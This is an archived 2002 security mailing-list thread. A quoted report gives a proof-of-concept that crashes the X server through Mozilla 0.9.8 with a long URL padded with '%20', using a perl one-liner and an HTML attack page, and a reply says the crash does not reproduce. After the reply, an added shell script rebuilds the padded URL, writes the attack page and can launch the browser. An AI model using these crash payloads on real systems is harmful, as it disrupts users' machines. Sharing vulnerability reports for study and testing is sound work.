On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> NOTE TO THE MODERATOR: This was sent yesterday but I guess it didn't
> make it since this doesn't seem to affect Red Hat itself; it affects
> the mozilla packages distributed by Ximian:
>
> The test system looks like:
>
> bash#~ rpm -qa | grep mozilla
> mozilla-0.9.8-1.ximian.2
> mozilla-mail-0.9.8-1.ximian.2
> mozilla-xmlterm-0.9.8-1.ximian.2
> mozilla-devel-0.9.8-1.ximian.2
> nautilus-mozilla-1.0.6-ximian.4
> mozilla-psm-0.9.8-1.ximian.2
> kdebindings-kmozilla-2.1.1-1
>
> This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all
> the updates).
>
>
> There is a bug in mozilla 0.9.8-1 which allows you
> to crash the X server.
>
> I won't go into details; I'll just show the proof
> of concept.
>
>
> exploit:
>
> Local:
> bash#~ mozilla `perl -e "print '%20' x 2618"`
>
>
> Remote:
> I haven't tested this, but I guess:
>
> echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
> ./attack.html
>
> perhaps using "img src" or java script...
>
>
> Best Regards
>
> --
> /*
> Rodrigo Gutierrez <rodrigoat_private>
> Trustix AS http://www.trustix.com
> */
>

On one box:

rpm -qa | grep mozilla
mozilla-chat-0.9.7-1
mozilla-mail-0.9.7-1
nautilus-mozilla-1.0.6-ximian.6
mozilla-0.9.7-1
mozilla-devel-0.9.7-1
mozilla-js-debugger-0.9.7-1
mozilla-psm-0.9.7-1
mozilla-dom-inspector-0.9.7-1

Results in "www.perl -e "print %20 x 2618".com could not be found" (lol)

perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't overflow perl.

On the other box:

rpm -qa | grep mozilla
nautilus-mozilla-1.0.6-ximian.6
mozilla-psm-0.9.8-2
mozilla-0.9.8-2
mozilla-devel-0.9.8-2

Results in the same 'not found' error.

The attack.html (as per your script) results in "www.'perl not found".

So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in 0.9.8-2.

--
NyQuist | Matthew Hall -- NyQuist at ntlworld dot com
Sig: Microsoft sells you Windows. Linux gives you the whole house.
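The one-liners in the thread nest double quotes inside backticks inside double quotes, and the reply above shows the literal text "perl" ending up in the URL rather than the padding. The script below is an added example, not part of either poster's message: it builds the same padded URL and attack page with unambiguous quoting, makes the padding count a parameter (2618 is the count from the report) so a threshold can be searched, and only launches `mozilla` (an assumption about the local reproduction step) when RUN_MOZILLA=1 is set.

```shell
#!/bin/sh
# Added example (not from either poster): build the long-URL test case
# from the thread with unambiguous quoting. The padding count is a
# parameter so the crash threshold can be searched; 2618 is the count
# given in the original report.

# Print N copies of '%20' with no trailing newline.
repeat_pct20() {
    n=$1
    i=0
    while [ "$i" -lt "$n" ]; do
        printf '%%20'
        i=$((i + 1))
    done
}

# Print the test URL: the scheme followed by N copies of '%20',
# matching the local PoC in the report.
build_url() {
    printf 'http://'
    repeat_pct20 "$1"
}

# Write an HTML page whose link href is the padded URL, matching the
# remote PoC. Using printf with a single-quoted format avoids the
# nested double quotes of the quoted one-liner, which the shell (or a
# copy-paste from mail) can mangle into a literal "perl" in the URL.
# Arguments: padding count, output path.
write_attack_page() {
    out=$2
    url=$(build_url "$1")
    printf '<a href="%s">attack_me</a>\n' "$url" > "$out"
}

# Local reproduction step (assumption: a `mozilla` binary on PATH).
# Disabled by default; export RUN_MOZILLA=1 to actually launch it.
# Optional first argument overrides the padding count.
if [ "${RUN_MOZILLA:-0}" = "1" ]; then
    mozilla "$(build_url "${1:-2618}")"
fi
```

Dot-source the file (`. ./longurl.sh`) to get `build_url` and `write_attack_page` in the current shell, or run it with `RUN_MOZILLA=1 sh longurl.sh 2618` to reproduce the local case; `write_attack_page 2618 ./attack.html` produces the remote test page.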
This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 10:38:53 PST